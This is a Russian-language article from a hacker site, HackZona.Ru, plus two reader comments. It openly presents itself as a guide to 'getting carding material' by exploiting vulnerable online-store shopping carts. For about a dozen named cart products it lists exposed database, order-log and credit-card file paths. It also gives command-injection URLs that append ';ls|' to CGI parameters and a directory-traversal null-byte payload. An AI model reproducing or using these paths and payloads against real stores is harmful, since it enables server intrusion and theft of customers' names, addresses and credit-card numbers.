Уязвимости онлайн магазинов — HackZona.Ru

Уязвимости онлайн магазинов

Уязвимости онлайн магазинов

Тип статьи:
Со старой ХакЗоны.
Источник:
Я решил продолжить начатую им тему добывания картона и предложить вашему вниманию данную статью, в ней я расскажу о нескольких уязвимых корзинах и способах, используя которые, можно получить инфу о покупках и соответственно кредитных картах.
Начнем...
Первым номером у нас идет корзинка под названием SalesCart (www.salescart.com)
Обладает приятной особенностью 8) Удаленный зарегистрированный пользователь может получить доступ к персональным данным других пользователей (типа номеров кредитных карточек =). Эта информация хранится в файле shop.mdb, который доступен любому пользователю.

ClickCartPro
Законченное решение для электронных магазинов. Система позволяет управлять складом, отслеживать заказы, управлять показом баннеров и делать многое-многое другое. В стандартной конфигурации программа хранит базы данных открытыми на сервере.
www.server.com/data/site/admin_user.db
www.server.com/cp/data/site/admin_user.db
www.server.com/data/cp/site/admin_user.db
База admin_user содержит пароли администраторов сайта. =)

MetaLinks MetaCart2.sql
Система покупок, основанная на ASP + MS SQL. Уязвимость в программе позволяет атакующему получить доступ к базе данных.
www.server.com/database/metacart.mdb
www.server.com/metacart/database/metacart.mdb

WebDiscount eShop
Позволяет исполнять команды.
www.server.com/cgi-bin/eshop.pl?seite=;ls|


Shopping Cart
Позволяет исполнять команды.
www.server.com/cgi-local/shop.pl/page=;ls|

QuikStore
Удобное решение для совершения покупок с помощью интернет карточек. Уязвимость в программе позволяет получить доступ к файлам сервера.
www.server.com/cgi-bin/quikstore.cgi?page=../quikstore.cgi%00html&cart_id=
Конфигурация хранится в файле: quikstore.cfg

Order Form v1.2
Открытая для просмотра директория: /Orders/, /order/, /orders/, etc...
Открытая информация о заказах: order_log_v12.dat (иногда order_log.dat)

Seaside Enterprises EZMall 2000
Исполняемый файл: mall2000.cgi
Открытая для просмотра директория: /mall_log_files/
Открытая информация о заказах: order.log

PDGSoft's PDG Shopping Cart 1.5
Исполняемый файл: shopper.cgi
Открытая для просмотра директория: /PDG_Cart/
Открытая информация о заказах: order.log
Конфигурация хранится в файле: shopper.conf

Mercantec's SoftCart
Исполняемый файл: SoftCart.exe
Открытая для просмотра директория: /orders/ и /pw/
Открытая информация о заказах: /orders/*.olf
Конфигурация хранится в файле: /pw/storemgr.pw

Perlshop
Исполняемый файл: SoftCart.exe
Открытая для просмотра директория: /store/customers/ и /store/temp_customers/
Открытая информация о заказах: Файлы с цифровыми именами (8 знаков)

WebShop
Исполняемый файл: WebShop.cgi
Открытая для просмотра директория: /WebShop/
Открытая информация о заказах: /WebShop/templates/cc.txt и /WebShop/logs/cc.txt

И вот буквально только что, пока я тут писал о корзинках, мой батник скачал свежую порцию багтрэка и там… Ышо одна дырявая корзинка =)

Alan Ward's A-Cart
(http://www.alanward.net/acart/) — система осуществления покупок через Web, разработанная в ASP для Windows систем.
Файл базы данных acart2_0.mdb хранится в Web директории и доступен для загрузки удаленным пользователям. В файле содержится регистрационная информация пользователей совершивших покупку (Имя, адрес, номера кредитных карт).

Ну вот для первого раза хватит =)
Нравится
Не нравится

2 комментария

23:23
Да постарались разработчики за такое вешать надо...
01:04
Интересно а розроботчики ето читают?